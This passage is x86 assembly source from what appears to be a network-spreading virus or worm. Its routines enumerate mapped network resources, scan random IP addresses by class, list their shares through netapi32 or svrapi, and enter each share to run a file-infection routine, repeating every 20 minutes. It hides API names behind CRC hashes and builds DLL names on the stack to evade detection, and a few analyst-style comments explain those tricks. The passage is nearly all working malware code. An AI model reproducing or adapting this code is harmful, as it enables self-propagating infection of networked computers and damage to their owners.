mov eax, esp
push eax
push esp
push eax
push ebx
call dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
pop edi
sub al, ERROR_MORE_DATA
jne wnet_close
push edi
push eax ;GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz wnet_close
push edi
mov eax, esp
push 1
mov edx, esp
push eax
push ecx
push edx
push ebx
mov edi, ecx
call dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
pop ecx
pop ecx
test eax, eax
jne wnet_free
test byte ptr [edi + NETRESOURCE.dwUsage], RESOURCEUSAGE_CONTAINER
jne wnet_open
push dword ptr [edi + NETRESOURCE.lpRemoteName]
call dword ptr [ebp + krncrcstk.kSetCurrentDirectoryW]
xchg ecx, eax
jecxz wnet_skipdir
;I'm alone here
;with emptiness eagles and snow.
;Unfriendliness chilling my body
;and taunting with pictures of home.
;(Deep Purple)
call find_files
wnet_skipdir label near
xor eax, eax
wnet_free label near
push eax
push edi
call cGlobalFree
pop ecx
jecxz wnet_next
wnet_close label near
push ebx
store_netapi label near
mov eax, '!bgr'
call eax ;WNetCloseEnum
mov ecx, dword ptr [esi + wnetlist.wnetprev]
jecxz wnet_exit
mov ebx, dword ptr [esi + wnetlist.wnethand]
push esi
mov esi, ecx
call cGlobalFree
jmp wnet_next
wnet_exit label near
push 20 * 60 * 1000 ;20 minutes
call cSleep
jmp find_wnet
find_wnet endp
;-----------------------------------------------------------------------------
;create_thr2: spawn thread 2 through the cCreateThread wrapper (esi pushed
;twice as its arguments) and fall through into the thread-3 body below
;(NOTE(review): that the current thread then becomes "thread 3" is inferred
;from the fall-through; cCreateThread, init_findmz, random and the other c*
;wrappers are defined elsewhere in the file)
;-----------------------------------------------------------------------------
create_thr2 label near
push esi
push esi
call cCreateThread
;-----------------------------------------------------------------------------
;thread 3: find files on random IP address shares using non-recursive algorithm
;(alter class A: 25%, class b: 25%, class c: 25%, class d: scan all)
;
;Analyst notes: the share-enumeration DLL name is assembled in registers and
;pushed, so no "netapi32"/"svrapi" literal exists in this listing and
;LoadLibraryA receives a pointer into the stack; the DLL exports are resolved
;from a CRC (hash) table rather than an import entry. Platform selection is
;bit 31 of GetVersion (set on 9x/Me), carried across the LoadLibraryA call
;with pushfd/popfd.
;-----------------------------------------------------------------------------
call cGetVersion
test eax, eax ;SF = bit 31 of the version dword (9x/Me sets it); mov leaves flags intact
mov eax, 'aten'
mov ecx, '23ip' ;"netapi32" (NT/2000/XP)
jns ip_loaddll
mov eax, 'arvs'
movzx ecx, cx ;"svrapi" (9x/Me): keep "pi" of '23ip', zero the upper half
ip_loaddll label near
pushfd ;preserve SF (platform choice) across the LoadLibraryA call
push 0 ;NUL terminator dword
push ecx
push eax ;8 name bytes + terminator now sit on the stack
push esp ;lpLibFileName -> the stack string
call cLoadLibraryA
add esp, 0ch ;drop the 12-byte stack string
popfd
jns ip_getprocnt ;NT family: resolve from the netapi32 table
call init_findmz ;9x/Me: the return address pushed here is the address of ip9xcrcbegin (use of it is defined in init_findmz)
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;(entries are zero in this listing; presumably filled in elsewhere)
;-----------------------------------------------------------------------------
ip9xcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ip9xcrc_count + 1) dup (0)
ip9xcrcend label near
dd offset ip_share - offset ip9xcrcend + 4 ;distance from the end of this dword to ip_share (looks like a rel32 continuation target)
ip_getprocnt label near
call init_findmz ;NT: same scheme, return address is the address of ipntcrcbegin
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;(entries are zero in this listing; presumably filled in elsewhere)
;-----------------------------------------------------------------------------
ipntcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ipntcrc_count + 1) dup (0)
ipntcrcend label near
dd offset ip_share - offset ipntcrcend + 4 ;distance from the end of this dword to ip_share (looks like a rel32 continuation target)
ip_share label near
call random
xchg ebx, eax ;initial IP address (ebx = random 32-bit starting point for the scan)
find_ip proc near
call random
and al, 18h
je find_ip ;select class A-C only
xchg ecx, eax
xor eax, eax
mov al, 0ffh
shl eax, cl ;select random class
and ecx, eax ;isolate new class
not eax
and ebx, eax ;remove old class
or ebx, ecx ;insert new class
ip_save label near
push ebx
bswap ebx
enter 34h, 0 ;size of Unicode '\\' + Unicode IP address + '\' + ANSI sharename
lea edi, dword ptr [ebp - 0eh] ;size of '\' + ANSI sharename
call cGetVersion
shr eax, 1fh ;0 if Unicode, 1 if ANSI
xchg esi, eax
xor al, al
mov cl, 0ah
std
stos byte ptr [edi]
mov edx, edi
stos byte ptr [edi] ;store Unicode sentinel
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
;-----------------------------------------------------------------------------
;convert IP address to string (ANSI or Unicode)
;-----------------------------------------------------------------------------
ip_shift label near
xor eax, eax
shld eax, ebx, 8
ip_hex2dec label near
div cl
xchg ah, al
add al, '0'
stos byte ptr [edi]
xor al, al
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
shr eax, 8
jne ip_hex2dec
mov al, '.'
stos byte ptr [edi]
xor al, al
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
shl ebx, 8
jne ip_shift
cld
push edi
mov al, '\'
stos byte ptr [edi]
inc edi ;include Unicode half-character
sub edi, esi ;remove character if ANSI
stos byte ptr [edi] ;store '\\' in ANSI or Unicode
pop edi
test esi, esi
je ip_sharent
;-----------------------------------------------------------------------------
;enumerate shares on IP address (9x/Me platform)
;-----------------------------------------------------------------------------
push ebx
mov eax, esp
push ebx
push esp
push eax
push ebx ;too small size returns needed size
push ebx
push 1
push edi
mov ebx, edi
mov edi, edx
call dword ptr [esp + 44h + ip9xcrcstk.ip9xNetShareEnum + 18h]
pop ecx
pop esi
sub al, ERROR_MORE_DATA
jne ip_restore
imul esi, ecx, size share_info_19x + 50
;include size of optional remark
push esi
push eax ;GMEM_FIXED
call cGlobalAlloc
cdq
xchg ecx, eax
jecxz ip_restore
push ecx ;GlobalFree
push edx
mov eax, esp
push edx
push esp
push eax
push esi
push ecx
push 1
push ebx
mov esi, ecx
call dword ptr [esp + 48h + ip9xcrcstk.ip9xNetShareEnum + 18h]
pop ecx
pop ecx
mov al, '\'
stos byte ptr [edi]
ip_next9x label near
push ecx
push edi
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs byte ptr [edi], byte ptr [esi] ;attach sharename
pop edi
push ebx
call cSetCurrentDirectoryA
xchg ecx, eax
jecxz ip_skip9x
;I dream of rain, I live my years under an open sky
call find_files
ip_skip9x label near
add esi, size share_info_19x - share_info_19x.shi1_pad1
pop ecx
loop ip_next9x
ip_free9x label near
call cGlobalFree
ip_restore label near
leave
pop ebx
inc bl
jne ip_save
push 20 * 60 * 1000 ;20 minutes
call cSleep
jmp find_ip
ip_sharent label near
;-----------------------------------------------------------------------------
;enumerate shares on IP address (NT/2000/XP platform)
;-----------------------------------------------------------------------------
push eax
mov eax, esp
push eax
mov ecx, esp
push ebx
push esp
push eax
push MAX_PREFERRED_LENGTH
push ecx
push 1
push edi
call dword ptr [esp + 44h + ipntcrcstk.ipntNetShareEnum + 1ch]
test eax, eax
pop esi
pop ebx
push esi ;NetApiBufferFree
jne ip_freent
ip_nextnt label near
push esi
lods dword ptr [esi]
push eax
xchg esi, eax
xor eax, eax ;lstrlenW
call store_krnapi
lea eax, dword ptr [eax + eax + 26h]
;include size of Unicode '\\' + Unicode IP address + Unicode '\'
push eax
push GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz ip_freent
push ecx ;GlobalFree
push ecx ;SetCurrentDirectoryW
push esi ;lstrcatW
push ecx ;lstrcatW
push '\'
push esp ;lstrcatW
push ecx ;lstrcatW
push edi
push ecx
push (krncrcstk.klstrcpyW - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi ;copy IP address
call clstrcatW ;attach '\'
pop eax
call clstrcatW ;attach sharename
push (krncrcstk.kSetCurrentDirectoryW - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
xchg esi, eax
call cGlobalFree
test esi, esi
je ip_skipnt
;when you look into the abyss, the abyss looks back at you
call find_files
ip_skipnt label near
pop esi
add esi, size share_info_1nt
dec ebx
jne ip_nextnt